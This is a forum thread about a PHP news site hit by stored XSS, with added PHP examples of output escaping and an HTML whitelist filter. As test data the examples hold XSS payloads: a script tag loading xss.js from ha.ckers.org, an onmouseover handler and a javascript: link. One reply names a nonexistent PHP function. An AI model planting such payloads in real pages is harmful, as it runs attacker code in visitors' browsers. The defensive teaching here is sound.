This is remote text via xss.js located at ha.ckers.org

Status
Not open for further replies.

jhdesign

New Member
First of all, that is nonsense. I have no JavaScript in my code, and second, I have never heard of this website or done anything with it. Please enlighten me!

Yours faithfully,

Jan aka JH Design
 

Mr. DOS

Member
You're going to have to tell us more - where in your site is this occurring, and is it in a script you wrote yourself?

From what I can tell, someone's exploited an XSS vulnerability in your site.

--- Mr. DOS
 

garrettroyce

Community Support
Your software isn't escaping HTML tags. Someone posted a <script> tag in a comments box, and your site's source now includes the script as well.

I would delete your page and start again with different software.

jhdesign

New Member
> Your software isn't escaping HTML tags. Someone posted a <script> tag in a comments box, and your site's source now includes the script as well.
>
> I would delete your page and start again with different software.

No, it's not completely written by me; I found it on a website which gives these scripts for usage. I only modified a large piece of it. And it occurs when getting something. It's a news system. So I post something and the code is receiving that. And from that point on my code just stops and tells me this warning. You can probably have a look yourself at http://janhaesen.co.cc

Yours faithfully,

Jan
 

garrettroyce

Community Support
> No, it's not completely written by me; I found it on a website which gives these scripts for usage. I only modified a large piece of it. And it occurs when getting something. It's a news system. So I post something and the code is receiving that. And from that point on my code just stops and tells me this warning. You can probably have a look yourself at http://janhaesen.co.cc
>
> Yours faithfully,
>
> Jan

I did look at the page. If you posted the content on the page and it was changed to this malicious content, then either the software isn't secure (contains a back door for hackers to get in), it has an exploit that a hacker has found, or your password was guessed. XSS attacks come almost exclusively through unsanitized user inputs. If you see a $_POST, $_GET, or $_REQUEST anywhere in your code, it had better have html_escape_special_chars or a preg_replace function around it, or your site is not safe.

I would still recommend changing software and I would change any passwords you use.
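The flaw garrettroyce is describing, reproduced and fixed in a few lines. This is an added example, not the news-system code from the thread: the form field name `body`, the two render functions and the sample payload are all assumed here, and the payload is constructed to match the `xss.js` reference in the first post. PHP is assumed because the advice above talks about `$_POST`, `$_GET` and `$_REQUEST`.

```php
<?php
// Added example (not the original news-system code): the flaw garrettroyce
// describes, and the fix. Field name 'body' and the render functions are assumed.

// Constructed sample: what the attacker submitted through the news form.
// When run from the CLI, $_POST is empty and this sample is used instead.
$attackerInput = '<script src="http://ha.ckers.org/xss.js"></script>';
$body = $_POST['body'] ?? $attackerInput;

// Vulnerable: the submitted text is concatenated straight into the page, so the
// browser treats it as markup and fetches and runs the attacker's script.
function renderNewsItemVulnerable(string $title, string $body): string
{
    return "<h2>$title</h2>\n<p>$body</p>\n";
}

// Hardened: every character with meaning in HTML (<, >, &, ", ') becomes an
// entity, so the browser displays the text and never parses it as a tag.
// ENT_QUOTES also makes the result safe inside quoted attribute values;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderNewsItemSafe(string $title, string $body): string
{
    return '<h2>' . escapeHtml($title) . "</h2>\n<p>" . escapeHtml($body) . "</p>\n";
}

$vulnerable = renderNewsItemVulnerable('Latest news', $body);
$safe       = renderNewsItemSafe('Latest news', $body);

// Regression check worth keeping: a live <script> tag must never reach the output.
assert(strpos($vulnerable, '<script') !== false); // the bug, reproduced
assert(strpos($safe, '<script') === false);       // the fix

echo "Vulnerable output:\n", $vulnerable, "\nEscaped output:\n", $safe;
```

Two things to keep in mind when applying this to the real script. Escape at output time, at every place a stored value is written into the page; storing the raw submission is fine, and escaping on the way in tends to get forgotten for the second or third output path. And `htmlspecialchars()` is only correct for the HTML body and for quoted attribute values: user data written inside a `<script>` block, a URL, or a CSS declaration needs an encoding for that context, so the safest habit is to keep user data out of those contexts altogether.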
 

jhdesign

New Member
> I did look at the page. If you posted the content on the page and it was changed to this malicious content, then either the software isn't secure (contains a back door for hackers to get in), it has an exploit that a hacker has found, or your password was guessed. XSS attacks come almost exclusively through unsanitized user inputs. If you see a $_POST, $_GET, or $_REQUEST anywhere in your code, it had better have html_escape_special_chars or a preg_replace function around it, or your site is not safe.
>
> I would still recommend changing software and I would change any passwords you use.

I figured out the problem. I'm now making a login page for it. Until now this script wasn't protected yet. My fault, but I didn't think people would make such a mess of it. Thanks for the quick reply. You really helped me out here!
 

misson

Community Paragon
Community Support
> I figured out the problem. I'm now making a login page for it. Until now this script wasn't protected yet. My fault, but I didn't think people would make such a mess of it. Thanks for the quick reply. You really helped me out here!

Requiring a visitor to log in won't guarantee security (just ask Myspace). You'll need to filter out unsafe text using (e.g.) the filter functions. If you wish to allow some HTML, you'll need to find (or write, but I don't recommend that path if you're a security newb) a whitelist filter.
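What a whitelist filter actually does, as an added example that is not part of the thread or of the news-system software. It takes misson's scenario: the site wants to allow some HTML in posts, so plain escaping is off the table. The input is constructed to mix legitimate formatting with the kind of markup that was injected into the site; the allow-list (`p`, `b`, `i`, `a` with an `http(s)` `href`) is an assumption for the example. The first half shows why `strip_tags()` with an allowed-tags list is not a whitelist filter in the sense misson means: it keeps the listed tags but also every attribute on them, so an `onmouseover` handler survives. The second half is a minimal element-and-attribute whitelist built on `DOMDocument`; the `<?xml encoding="UTF-8">` prefix is the usual trick to make libxml treat the fragment as UTF-8. For a production site, misson's advice stands: use a maintained library such as HTML Purifier rather than your own filter.

```php
<?php
// Added example, not code from the thread. Constructed input: harmless
// formatting mixed with the markup that was injected into the news page.
$submitted = '<p>Great <b onmouseover="alert(1)">news</b>!</p>'
           . '<script src="http://ha.ckers.org/xss.js"></script>'
           . '<a href="javascript:alert(1)">click</a>'
           . '<a href="http://example.com/">ok link</a>';

// strip_tags() with an allow-list removes <script> but leaves every attribute
// on the tags it keeps, so the onmouseover handler is still live.
$viaStripTags = strip_tags($submitted, '<p><b><a>');
assert(strpos($viaStripTags, 'onmouseover') !== false);

// Whitelist filter: parse the fragment, keep only listed elements and the
// attributes listed for each, and require href to be an absolute http(s) URL.
// Everything not on the list is dropped; that is what makes it a whitelist.
function filterHtml(string $html): string
{
    // element => attributes that may stay on it (assumed policy for this example)
    $allowed = ['p' => [], 'b' => [], 'i' => [], 'a' => ['href']];

    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // malformed input is expected; no warnings
    $doc->loadHTML(
        '<?xml encoding="UTF-8"><div>' . $html . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD
    );
    libxml_clear_errors();

    $root = $doc->getElementsByTagName('div')->item(0);
    cleanNode($root, $allowed);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child); // text nodes are re-escaped on output
    }
    return $out;
}

function cleanNode(DOMNode $node, array $allowed): void
{
    // Walk a static copy: the live child list is mutated while we iterate.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child->nodeType === XML_ELEMENT_NODE) {
            $tag = strtolower($child->nodeName);
            if (!isset($allowed[$tag])) {
                // Drop disallowed elements with their content. For <script> this
                // matters: the code must not survive even as visible text.
                $node->removeChild($child);
                continue;
            }
            // Remove every attribute not explicitly allowed for this tag
            // (on* handlers, style, id, ...).
            foreach (iterator_to_array($child->attributes) as $attr) {
                if (!in_array($attr->name, $allowed[$tag], true)) {
                    $child->removeAttribute($attr->name);
                }
            }
            // href must be an absolute http(s) URL; javascript:, data: and
            // relative links are rejected (relative links are a policy choice here).
            if ($child->hasAttribute('href')
                && !preg_match('#^https?://#i', trim($child->getAttribute('href')))) {
                $child->removeAttribute('href');
            }
            cleanNode($child, $allowed);
        } elseif ($child->nodeType !== XML_TEXT_NODE) {
            // Comments, CDATA, processing instructions: nothing legitimate here.
            $node->removeChild($child);
        }
    }
}

$filtered = filterHtml($submitted);
assert(strpos($filtered, '<script') === false);
assert(strpos($filtered, 'onmouseover') === false);
assert(strpos($filtered, 'javascript:') === false);
assert(strpos($filtered, 'http://example.com/') !== false);

echo "strip_tags result:\n", $viaStripTags, "\n\nWhitelist result:\n", $filtered, "\n";
```

The design point is the direction of the check. A blacklist (a `preg_replace` that removes `<script>`, say) has to anticipate every dangerous construct, including event handlers, `javascript:` URLs and encoding tricks; a whitelist only has to describe the small set of markup the site wants, and everything else falls out by default. That is also why it is hard to get right by hand: the allow-list has to cover attribute values (URL schemes, `style`) and not just tag names, which is the part `strip_tags()` gets wrong.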
 